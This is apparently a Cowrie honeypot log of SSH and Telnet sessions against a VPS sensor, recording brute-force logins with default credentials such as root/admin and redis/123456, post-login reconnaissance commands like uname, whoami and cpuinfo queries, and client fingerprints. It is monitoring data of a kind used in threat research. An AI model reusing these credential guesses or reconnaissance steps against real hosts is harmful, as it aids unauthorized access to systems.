{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-28T13:16:43.839784Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:44.049523Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:44.527368Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:16:44.528118Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:44.738194Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:45.590696Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-28T13:16:45.591383Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:45.801203Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:46.237288Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-28T13:16:46.238039Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:46.448650Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:46.927257Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T13:16:46.928024Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:47.138237Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:47.619429Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T13:16:47.620214Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:47.830292Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:48.310315Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-28T13:16:48.311015Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:48.521020Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:48.998184Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-28T13:16:48.998907Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:49.209755Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.closed","duration":"26.2","message":"Connection lost after 26.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:49.211009Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57608,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba4dddf7eece","protocol":"ssh","message":"New connection: 212.227.125.160:57608 (1.2.3.4:22) [session: ba4dddf7eece]","sensor":"my-vps","timestamp":"2025-08-28T13:17:05.887055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:17:05.888099Z","src_ip":"212.227.125.160","session":"ba4dddf7eece"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:17:06.051727Z","src_ip":"212.227.125.160","session":"ba4dddf7eece"}
{"eventid":"cowrie.login.failed","username":"redis","password":"123456","message":"login attempt [redis/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:17:06.780709Z","src_ip":"212.227.125.160","session":"ba4dddf7eece"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:17:07.946308Z","src_ip":"212.227.125.160","session":"ba4dddf7eece"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":53232,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0a89d7932ab","protocol":"telnet","message":"New connection: 79.124.8.120:53232 (1.2.3.4:23) [session: f0a89d7932ab]","sensor":"my-vps","timestamp":"2025-08-28T13:17:26.775745Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:17:26.815727Z","src_ip":"79.124.8.120","session":"f0a89d7932ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:17:27.203316Z","src_ip":"79.124.8.120","session":"f0a89d7932ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43052,"dst_ip":"1.2.3.4","dst_port":22,"session":"94a96f854793","protocol":"ssh","message":"New connection: 212.227.125.160:43052 (1.2.3.4:22) [session: 94a96f854793]","sensor":"my-vps","timestamp":"2025-08-28T13:17:33.013492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:17:33.364643Z","src_ip":"212.227.125.160","session":"94a96f854793"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:17:33.365351Z","src_ip":"212.227.125.160","session":"94a96f854793"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59798,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b83dc9df23d","protocol":"ssh","message":"New connection: 212.227.235.229:59798 (1.2.3.4:22) [session: 4b83dc9df23d]","sensor":"my-vps","timestamp":"2025-08-28T13:17:41.904983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:17:41.907364Z","src_ip":"212.227.235.229","session":"4b83dc9df23d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:17:43.114966Z","src_ip":"212.227.235.229","session":"4b83dc9df23d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58002,"dst_ip":"1.2.3.4","dst_port":22,"session":"30273c27a2ef","protocol":"ssh","message":"New connection: 212.227.125.160:58002 (1.2.3.4:22) [session: 30273c27a2ef]","sensor":"my-vps","timestamp":"2025-08-28T13:17:43.122825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:17:43.123647Z","src_ip":"212.227.125.160","session":"30273c27a2ef"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:17:43.287449Z","src_ip":"212.227.125.160","session":"30273c27a2ef"}
{"eventid":"cowrie.login.failed","username":"redis","password":"password","message":"login attempt [redis/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:17:43.779364Z","src_ip":"212.227.125.160","session":"30273c27a2ef"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:17:44.305020Z","src_ip":"212.227.235.229","session":"4b83dc9df23d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:17:44.945969Z","src_ip":"212.227.125.160","session":"30273c27a2ef"}
{"eventid":"cowrie.session.closed","duration":"12.9","message":"Connection lost after 12.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:17:45.909211Z","src_ip":"212.227.125.160","session":"94a96f854793"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37586,"dst_ip":"1.2.3.4","dst_port":22,"session":"4faeb137b9d9","protocol":"ssh","message":"New connection: 212.227.125.160:37586 (1.2.3.4:22) [session: 4faeb137b9d9]","sensor":"my-vps","timestamp":"2025-08-28T13:18:20.970750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:18:21.068998Z","src_ip":"212.227.125.160","session":"4faeb137b9d9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:18:21.289950Z","src_ip":"212.227.125.160","session":"4faeb137b9d9"}
{"eventid":"cowrie.login.failed","username":"redis","password":"123456789","message":"login attempt [redis/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:18:21.855192Z","src_ip":"212.227.125.160","session":"4faeb137b9d9"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:18:23.027638Z","src_ip":"212.227.125.160","session":"4faeb137b9d9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64166,"dst_ip":"1.2.3.4","dst_port":22,"session":"82ae2f1ba50d","protocol":"ssh","message":"New connection: 217.72.205.35:64166 (1.2.3.4:22) [session: 82ae2f1ba50d]","sensor":"my-vps","timestamp":"2025-08-28T13:18:57.715239Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:18:57.716433Z","src_ip":"217.72.205.35","session":"82ae2f1ba50d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59656,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e46269f97f8","protocol":"ssh","message":"New connection: 212.227.125.160:59656 (1.2.3.4:22) [session: 6e46269f97f8]","sensor":"my-vps","timestamp":"2025-08-28T13:19:00.056041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:19:00.057128Z","src_ip":"212.227.125.160","session":"6e46269f97f8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:19:00.222886Z","src_ip":"212.227.125.160","session":"6e46269f97f8"}
{"eventid":"cowrie.login.failed","username":"redis","password":"12345","message":"login attempt [redis/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:19:00.889971Z","src_ip":"212.227.125.160","session":"6e46269f97f8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:19:02.164024Z","src_ip":"212.227.125.160","session":"6e46269f97f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58088,"dst_ip":"1.2.3.4","dst_port":22,"session":"47eeb155955b","protocol":"ssh","message":"New connection: 212.227.125.160:58088 (1.2.3.4:22) [session: 47eeb155955b]","sensor":"my-vps","timestamp":"2025-08-28T13:19:35.787860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:19:35.788808Z","src_ip":"212.227.125.160","session":"47eeb155955b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:19:35.957674Z","src_ip":"212.227.125.160","session":"47eeb155955b"}
{"eventid":"cowrie.login.failed","username":"redis","password":"12345678","message":"login attempt [redis/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:19:36.598475Z","src_ip":"212.227.125.160","session":"47eeb155955b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:19:37.769554Z","src_ip":"212.227.125.160","session":"47eeb155955b"}
